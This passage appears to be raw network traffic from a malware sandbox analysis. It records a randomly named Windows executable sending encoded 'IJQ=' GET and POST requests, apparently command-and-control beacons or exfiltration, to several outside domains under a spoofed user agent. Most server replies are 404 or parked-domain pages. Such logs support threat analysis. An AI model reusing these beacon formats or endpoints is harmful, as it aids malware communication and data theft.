                                                Data Raw: 49 4a 51 3d 30 30 78 36 4e 63 31 4f 48 63 67 48 58 63 55 73 32 4c 51 47 33 6b 6e 71 4b 70 4a 74 2b 6e 42 66 37 58 59 69 62 63 35 7a 68 48 6c 47 6b 67 33 71 56 77 36 6b 2f 77 4e 4f 6b 41 6b 30 37 33 53 2f 2f 46 51 69 34 4a 78 65 4e 33 45 58 35 4c 35 51 36 2b 56 67 4b 4c 6a 32 48 63 6c 38 59 64 2b 2b 30 48 37 36 77 6e 6f 53 70 35 76 2f 47 57 58 67 59 43 6b 73 48 37 63 56 46 54 4b 72 4b 6b 6b 46 61 76 54 57 64 76 74 39 42 31 35 47 6d 35 73 7a 52 4c 78 64 52 61 48 32 38 72 2f 68 35 50 62 37 78 7a 6d 57 44 44 32 32 4b 46 52 75 63 57 62 6d 54 46 36 68 4c 6f 38 4b 48 4c 57 4b 73 69 6a 53 45 72 55 63 4d 59 6c 34 5a 54 37 31 72 67 47 49 47 77 62 2b 6b 63 37 75 49 52 42 43 44 43 4c 42 57 75 6c 38 78 57 71 53 51 35 70 79 4d 4d 4b 41 64 6f 30 79 38 2f 49 62 2f 37 4c 43 6d 67 75 72 43 6e 6c 35 79 76 44 56 49 36 2f 65 4a 77 61 73 67 43 52 75 59 35 4f 4d 4a 43 70 55 4a 75 33 72 49 54 65 32 41 34 53 32 6e 6b 59 50 59 52 74 31 66 4b 33 4c 78 51 6c 2f 54 56 41 76 2f 2f 7a 47 6e 76 52 61 38 52 6a 79 7a 4c 66 62 6d 75 [TRUNCATED]
                                                Data Ascii: IJQ=00x6Nc1OHcgHXcUs2LQG3knqKpJt+nBf7XYibc5zhHlGkg3qVw6k/wNOkAk073S//FQi4JxeN3EX5L5Q6+VgKLj2Hcl8Yd++0H76wnoSp5v/GWXgYCksH7cVFTKrKkkFavTWdvt9B15Gm5szRLxdRaH28r/h5Pb7xzmWDD22KFRucWbmTF6hLo8KHLWKsijSErUcMYl4ZT71rgGIGwb+kc7uIRBCDCLBWul8xWqSQ5pyMMKAdo0y8/Ib/7LCmgurCnl5yvDVI6/eJwasgCRuY5OMJCpUJu3rITe2A4S2nkYPYRt1fK3LxQl/TVAv//zGnvRa8RjyzLfbmuCIHaDdBaP1GT3zZvb4js9UamRu/JduMccIYWtti6M4lSZXQvufrUhN8lkVv/GEiyEtMCFIfpWnLO446CR/+k+EaeeudWrYG0/WH/x9/Htg4YiGvJ7aALJcM8sakhJF+f4mjoWngWBFn3r17l/V0oY2hS+tZgNGQ2n6qeAQEFBceaaBE3/jhnGipK6zjNC9WbrS3KSus2dzjdVq9NglKL4wXmOBE9K0K5y4bgdKvw5x2yc+mmkZPnw1pt8k9yfDppngmGL7E9eY36m9BpSqxvcrxFAnfB9PbjIO82t0YhJ3yGjBkMPYVteKxivGfRxoH4YrgRNztqxM2jC6n9IngvOEh39P8Nhc4G/e4Gf2vBnG/HBfGWbumo3aqwRFtvHQwdqgvrt9Pkjn3jTlIWSzgQDjdoniie39Z4Ucad9Frf70q6nzP9KLuDJXcrBCjJBAeobhEaje+IwMMo3pYjBXmaFQ8u4U5ua9321iEQQza8iet9dd4tMf9elg6lHz1n3VVkNyRLg0bmZ8IJW/tLlhvG2S3f0+iMLWExrZMscRfAfezul6w+h8fVmUmZLd39ITdQANXNaXanau8bqr16Y5YdIFIwNZjeiYbDiVvZS6zy93ThXPP+JyslB0IMzo7e6j6tO1yOYCVpw4eKKyRr0FY57Qo43kk6liNtnr [TRUNCATED]
                                                Jan 10, 2025 23:42:01.069921970 CET558INHTTP/1.1 404 Not Found
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Date: Fri, 10 Jan 2025 22:42:00 GMT
                                                Server: Apache
                                                Content-Encoding: gzip
                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.1161141217.160.0.183806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:42:03.089250088 CET407OUTGET /o5mm/?IJQ=52ZaOoJJHsYFYpcHg+Nk6TaLHqcYp0Vxq28CYNd7tHRxqCukViCUoH1jhmN2/g+W5SkTzZJsaEIA3pVY9O1vDo3OOfdhA/KFz3DOpUouoe/3RRH1ei5BFqs=&GF=mlOXG HTTP/1.1
                                                Host: www.kubex.dev
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.5
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                Jan 10, 2025 23:42:03.714968920 CET745INHTTP/1.1 404 Not Found
                                                Content-Type: text/html
                                                Content-Length: 601
                                                Connection: close
                                                Date: Fri, 10 Jan 2025 22:42:03 GMT
                                                Server: Apache
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.116114284.32.84.32806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:42:08.795057058 CET674OUTPOST /073p/ HTTP/1.1
                                                Host: www.sido247.pro
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate
                                                Accept-Language: en-US,en;q=0.5
                                                Origin: http://www.sido247.pro
                                                Referer: http://www.sido247.pro/073p/
                                                Content-Length: 200
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                Data Raw: 49 4a 51 3d 41 75 31 72 45 2b 31 4f 50 38 59 57 6b 4c 58 45 49 4a 4f 43 6c 79 4e 63 79 7a 6b 56 4e 72 62 43 2b 42 32 36 57 56 72 54 32 32 51 7a 4e 69 53 39 70 42 4e 31 4e 31 74 75 45 31 56 4a 49 6c 56 79 48 6d 32 55 64 50 53 6f 45 33 42 79 59 75 67 6b 5a 69 68 30 68 77 6f 67 50 50 41 47 67 55 48 31 30 68 42 71 72 66 4c 41 32 69 4a 50 39 4b 4c 77 4a 43 76 2f 43 42 6d 76 64 71 54 5a 67 62 7a 43 50 55 54 6a 32 6d 2b 56 64 57 66 74 70 67 78 46 54 70 4d 6e 64 73 70 67 4e 38 6b 4e 33 41 67 73 70 59 57 72 64 6c 2f 61 6b 4e 73 5a 31 31 52 69 55 6a 51 6d 77 2f 51 71 52 30 6e 48 2f 48 70 6e 63 41 3d 3d
                                                Data Ascii: IJQ=Au1rE+1OP8YWkLXEIJOClyNcyzkVNrbC+B26WVrT22QzNiS9pBN1N1tuE1VJIlVyHm2UdPSoE3ByYugkZih0hwogPPAGgUH10hBqrfLA2iJP9KLwJCv/CBmvdqTZgbzCPUTj2m+VdWftpgxFTpMndspgN8kN3AgspYWrdl/akNsZ11RiUjQmw/QqR0nH/HpncA==


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.116114384.32.84.32806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:42:11.343384981 CET694OUTPOST /073p/ HTTP/1.1
                                                Host: www.sido247.pro
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate
                                                Accept-Language: en-US,en;q=0.5
                                                Origin: http://www.sido247.pro
                                                Referer: http://www.sido247.pro/073p/
                                                Content-Length: 220
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                Data Raw: 49 4a 51 3d 41 75 31 72 45 2b 31 4f 50 38 59 57 6b 76 54 45 4b 75 79 43 67 53 4d 75 72 44 6b 56 44 4c 62 47 2b 42 4b 36 57 52 61 49 32 41 41 7a 4e 48 2b 39 75 41 4e 31 42 56 74 75 50 56 56 47 56 56 55 2b 48 6d 36 36 64 4c 53 6f 45 33 56 79 59 72 63 6b 5a 56 31 33 7a 51 6f 69 55 66 41 45 75 30 48 31 30 68 42 71 72 66 66 75 32 69 52 50 39 37 37 77 49 6a 76 67 4c 68 6d 67 4b 61 54 5a 72 37 7a 4f 50 55 54 52 32 6a 6d 2f 64 55 6e 74 70 67 42 46 54 63 77 6b 58 73 70 6d 43 63 6c 73 34 51 67 70 70 4c 66 61 65 31 72 41 75 50 63 32 77 7a 63 34 45 41 5a 78 7a 73 59 6f 46 53 47 33 32 32 4d 75 48 43 62 50 30 64 79 2f 37 75 4a 78 68 55 6a 59 4f 55 64 57 30 36 30 3d
                                                Data Ascii: IJQ=Au1rE+1OP8YWkvTEKuyCgSMurDkVDLbG+BK6WRaI2AAzNH+9uAN1BVtuPVVGVVU+Hm66dLSoE3VyYrckZV13zQoiUfAEu0H10hBqrffu2iRP977wIjvgLhmgKaTZr7zOPUTR2jm/dUntpgBFTcwkXspmCcls4QgppLfae1rAuPc2wzc4EAZxzsYoFSG322MuHCbP0dy/7uJxhUjYOUdW060=


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.116114484.32.84.32806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:42:13.892664909 CET1707OUTPOST /073p/ HTTP/1.1
                                                Host: www.sido247.pro
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate
                                                Accept-Language: en-US,en;q=0.5
                                                Origin: http://www.sido247.pro
                                                Referer: http://www.sido247.pro/073p/
                                                Content-Length: 1232
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                Data Raw: 49 4a 51 3d 41 75 31 72 45 2b 31 4f 50 38 59 57 6b 76 54 45 4b 75 79 43 67 53 4d 75 72 44 6b 56 44 4c 62 47 2b 42 4b 36 57 52 61 49 32 41 49 7a 4d 78 71 39 6f 6a 6c 31 41 56 74 75 47 31 55 68 56 56 56 6b 48 69 65 32 64 4c 57 53 45 30 74 79 4b 64 6f 6b 66 6b 31 33 35 51 6f 69 4c 50 41 46 67 55 48 73 30 68 52 75 72 66 50 75 32 69 52 50 39 35 6a 77 50 79 76 67 4e 68 6d 76 64 71 54 4e 67 62 7a 69 50 51 32 6b 32 69 53 46 64 45 48 74 70 45 74 46 55 2b 59 6b 56 4d 70 6b 4f 38 6c 4f 34 51 74 35 70 50 47 6c 65 32 33 35 75 4e 38 32 39 30 70 36 55 45 42 4d 6c 4f 4d 36 63 79 43 48 33 31 63 75 66 31 50 75 33 2b 75 4a 6b 59 52 59 69 45 69 77 66 6d 78 68 69 2b 58 76 58 63 37 66 4e 6a 6e 6a 42 59 2b 64 53 58 33 77 44 54 6f 59 46 52 49 43 32 6f 4b 79 31 42 67 64 72 6b 6b 74 44 76 2b 34 44 64 46 48 55 43 72 58 32 53 33 66 4d 31 41 70 69 4c 36 50 45 6e 7a 66 57 30 43 6d 31 55 55 6f 68 55 71 79 31 58 52 68 74 37 39 45 75 54 50 35 56 47 48 68 4a 47 49 42 56 5a 7a 4d 76 2b 7a 75 53 67 4d 6f 35 57 45 42 4a 73 76 53 61 73 [TRUNCATED]
                                                Data Ascii: IJQ=Au1rE+1OP8YWkvTEKuyCgSMurDkVDLbG+BK6WRaI2AIzMxq9ojl1AVtuG1UhVVVkHie2dLWSE0tyKdokfk135QoiLPAFgUHs0hRurfPu2iRP95jwPyvgNhmvdqTNgbziPQ2k2iSFdEHtpEtFU+YkVMpkO8lO4Qt5pPGle235uN8290p6UEBMlOM6cyCH31cuf1Pu3+uJkYRYiEiwfmxhi+XvXc7fNjnjBY+dSX3wDToYFRIC2oKy1BgdrkktDv+4DdFHUCrX2S3fM1ApiL6PEnzfW0Cm1UUohUqy1XRht79EuTP5VGHhJGIBVZzMv+zuSgMo5WEBJsvSasc7IGXKpqIXl1+hITPI4SPtMgXv0/kfbGH1DmxeBFxc82A01tZ8I+qjHaEQLyIk+kNYQbJkHt/oBfrPADt643w480DidiqiRaOARR0bmGUbrTxjryAgGX/HgHPop3sQfNMttlxpkGKMHOj98856Y9hWMS3inEVNhXUurHPqr+IF5Ydq6S7JP7lXMM2l0PPeYniRbE0KiO8/Ulx1OHYIj4MnC1xMgCL4ArgOhrlZz6+ygFijSsJvT2z49bOG+rYRQUWIHblaiW/a8OnkFhfX2DB1yjZBBiO5N7k6l0HQayVPP5bG43ac0jUp0eY4qjBll8X/vKDUEqePfnPkp6G5c9c5/Mg7AjsyjOFCWIBvK9Ylr7QWyd1O0cPPlZtU/NVpam28S3wHzE+xBt8s5YCHBRTZz/E+8yk4xWKfJftJGgkjzIXhQDWI8cFlIqp2YkdRrmK5HVxaqyvpEBbKhj4gO5pSJt7XW+EkYsSYxrlN1M9zcAx8yXqJ1Lvt4/qjGS0L1aH8ookFnIYLbvsdMmpbS1/0HjNgpceN+jGOmNl7hA0Ued4PYFEtvuHH9O7J26v5F/mDC2wi601vw51oGViwCu1GPMKr4wSTIKxrk6UbUYuuuxXoWcAib3ep/RbdsBZ10pIldXx1M3njVcURTboolZeQFL+R4d8nv/Iu [TRUNCATED]


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.116114584.32.84.32806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:42:16.443977118 CET409OUTGET /073p/?GF=mlOXG&IJQ=NsdLHLYUe9sblrm3UOGRvC4p7TYTQZr/4RSieCn+7DwPKByw7jhxCyN0LTJMQHRDPlmDRdKjKllFY9ccUXh84wh4P+Mkk2rH6R5Xw9P/6Vdw6OeNADfEYyY= HTTP/1.1
                                                Host: www.sido247.pro
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.5
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                Jan 10, 2025 23:42:16.904479980 CET1236INHTTP/1.1 200 OK
                                                Date: Fri, 10 Jan 2025 22:42:16 GMT
                                                Content-Type: text/html
                                                Content-Length: 9973
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Server: hcdn
                                                alt-svc: h3=":443"; ma=86400
                                                x-hcdn-request-id: 30ccef731dc7c428522a43e5075071f0-bos-edge3
                                                Expires: Fri, 10 Jan 2025 22:42:15 GMT
                                                Cache-Control: no-cache
                                                Accept-Ranges: bytes
                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                Jan 10, 2025 23:42:16.904510021 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                Jan 10, 2025 23:42:16.904520988 CET448INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                Jan 10, 2025 23:42:16.904531956 CET1236INData Raw: 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e
                                                Data Ascii: ;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.section-title{color:#2f1c6a;fo
                                                Jan 10, 2025 23:42:16.904542923 CET1236INData Raw: 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73
                                                Data Ascii: }.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-44" async></script><scrip
                                                Jan 10, 2025 23:42:16.904552937 CET1236INData Raw: 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 75 73 65 72 73 22 3e 3c 2f 69 3e 20 41 66 66 69 6c 69 61 74 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 68 70 61
                                                Data Ascii: a-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><div class=empty-account-page><div
                                                Jan 10, 2025 23:42:16.904567957 CET1236INData Raw: 6f 75 72 20 77 65 62 73 69 74 65 20 74 6f 20 61 6e 79 20 6f 66 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 73 2e 20 46 6f 6c 6c 6f 77 20 74 68 65 20 61 72 74 69 63 6c 65 20 62 65 6c 6f 77 20 74 6f 20 61 64 64 20 79 6f 75 72 20 64 6f 6d
                                                Data Ascii: our website to any of your hosting plans. Follow the article below to add your domain at Hostinger.</p><br><a href=https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a websit
                                                Jan 10, 2025 23:42:16.904654980 CET1236INData Raw: 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 22 29 7d 7d 3b 76 61 72 20 6f 3d 33 36 2c 72 3d 32 31 34 37 34 38 33 36 34 37 3b 66 75 6e 63 74 69 6f 6e 20 65 28 6f 2c 72 29 7b 72 65 74 75 72 6e 20 6f 2b 32 32 2b 37 35 2a 28 6f 3c 32 36 29 2d 28 28 30 21 3d
                                                Data Ascii: urn e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;for(r=n?Math.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=f
                                                Jan 10, 2025 23:42:16.904665947 CET552INData Raw: 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 3b 61 26 26 28 77 3d 74 68 69 73 2e 75 74 66 31 36 2e 64 65 63 6f 64 65 28 74 29 29 3b 76 61 72 20 76 3d 28 74 3d 74 68 69 73 2e 75 74 66 31 36 2e 64 65 63 6f 64 65 28 74 2e 74 6f 4c 6f 77
                                                Data Ascii: i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+(
                                                Jan 10, 2025 23:42:16.904678106 CET660INData Raw: 3c 3d 75 3f 31 3a 75 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 75 29 29 3b 67 2b 3d 6f 29 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 28 73 2b 28 70 2d 73 29 25 28 6f 2d 73 29 2c 30 29 29 29 2c 70 3d 4d 61 74 68
                                                Data Ascii: <=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split(


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.1161146209.74.79.42806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:42:22.065982103 CET677OUTPOST /dheh/ HTTP/1.1
                                                Host: www.glowups.life
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate
                                                Accept-Language: en-US,en;q=0.5
                                                Origin: http://www.glowups.life
                                                Referer: http://www.glowups.life/dheh/
                                                Content-Length: 200
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
